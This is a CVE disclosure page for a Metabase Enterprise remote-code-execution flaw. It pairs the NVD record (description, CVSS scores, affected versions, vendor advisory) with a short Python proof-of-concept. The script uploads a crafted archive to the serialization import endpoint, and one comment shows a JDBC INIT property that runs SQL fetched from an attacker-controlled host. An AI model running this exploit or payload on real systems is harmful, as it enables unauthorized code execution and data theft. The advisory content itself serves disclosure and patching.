CVE-2026-33725

import requests # Target URL url = "https://target-metabase.com/api/ee/serialization/import" # Authenticated Admin Session Token session_token = "YOUR_ADMIN_SESSION_TOKEN" headers = { "Cookie": f"metabase.SESSION={session_token}" } # The PoC requires a crafted serialization archive file. # This file should contain an H2 JDBC spec with a malicious 'INIT' property. # Example logic inside the crafted archive: jdbc:h2:mem:test;INIT=RUNSCRIPT FROM 'http://attacker.com/exploit.sql' files = { 'file': ('exploit.mb', open('metabase_exploit.mb', 'rb'), 'application/octet-stream') } try: response = requests.post(url, headers=headers, files=files) if response.status_code == 200: print("[+] Payload uploaded successfully.") print("[*] Trigger a database sync to execute the payload.") else: print(f"[-] Upload failed with status: {response.status_code}") print(response.text) except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-33725", "sourceIdentifier": "[email protected]", "published": "2026-03-27T01:16:19.837", "lastModified": "2026-04-01T15:57:59.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Metabase is an open source business intelligence and embedded analytics tool. In Metabase Enterprise prior to versions 1.54.22, 1.55.22, 1.56.22, 1.57.16, 1.58.10, and 1.59.4, authenticated admins on Metabase Enterprise Edition can achieve Remote Code Execution (RCE) and Arbitrary File Read via the `POST /api/ee/serialization/import` endpoint. A crafted serialization archive injects an `INIT` property into the H2 JDBC spec, which can execute arbitrary SQL during a database sync. We confirmed this was possible on Metabase Cloud. This only affects Metabase Enterprise. Metabase OSS lacks the affected codepaths. All versions of Metabase Enterprise that have serialization, which dates back to at least version 1.47, are affected. Metabase Enterprise versions 1.54.22, 1.55.22, 1.56.22, 1.57.16, 1.58.10, and 1.59.4 patch the issue. As a workaround, disable the serialization import endpoint in their Metabase instance to prevent access to the vulnerable codepaths."}, {"lang": "es", "value": "Metabase es una herramienta de inteligencia de negocios de código abierto y análisis embebido. En Metabase Enterprise anterior a las versiones 1.54.22, 1.55.22, 1.56.22, 1.57.16, 1.58.10 y 1.59.4, los administradores autenticados en Metabase Enterprise Edition pueden lograr Ejecución Remota de Código (RCE) y Lectura Arbitraria de Archivos a través del endpoint 'POST /API/ee/serialization/import'. Un archivo de serialización manipulado inyecta una propiedad 'INIT' en la especificación H2 JDBC, que puede ejecutar SQL arbitrario durante una sincronización de base de datos. Confirmamos que esto era posible en Metabase Cloud. Esto solo afecta a Metabase Enterprise. Metabase OSS carece de las rutas de código afectadas. Todas las versiones de Metabase Enterprise que tienen serialización, lo que se remonta al menos a la versión 1.47, están afectadas. Las versiones de Metabase Enterprise 1.54.22, 1.55.22, 1.56.22, 1.57.16, 1.58.10 y 1.59.4 parchean el problema. Como solución alternativa, deshabilite el endpoint de importación de serialización en su instancia de Metabase para evitar el acceso a las rutas de código vulnerables."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:metabase:metabase:*:*:*:*:enterprise:*:*:*", "versionEndExcluding": "1.54.22", "matchCriteriaId": "5FCFE67B-8A5E-45D2-BD6D-F4EC79D37CF3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:metabase:metabase:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "1.55.0", "versionEndExcluding": "1.55.22", "matchCriteriaId": "D480FC19-D356-4ED2-8B54-531E5E84E159"}, {"vulnerable": true, "criteria": "cpe:2.3:a:metabase:metabase:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "1.56.0", "versionEndExcluding": "1.56.22", "matchCriteriaId": "4CDA1028-BBCD-4BF0-A3C4-9D961E95C165"}, {"vulnerable": true, "criteria": "cpe:2.3:a:metabase:metabase:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "1.57.0", "versionEndExcluding": "1.57.16", "matchCriteriaId": "9B11088D-C12A-4782-95A9-96D47DECE1C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:metabase:metabase:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "1.58.0", "versionEndExcluding": "1.58.10", "matchCriteriaId": "5148A309-3FE0-47CE-9613-30421D8B5299"}, {"vulnerable": true, "criteria": "cpe:2.3:a:metabase:metabase:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "1.59.0", "versionEndExcluding": "1.59.4", "matchCriteriaId": "9D1B94DC-E468-4175-A1BC-E078E8D32A63"}]}]}], "references": [{"url": "https://github.com/metabase/metabase/security/advisories/GHSA-fppj-vcm3-w229", "source": "[email protected]", "tags": ["Mitigation", "Patch", "Vendor Advisory"]}]}}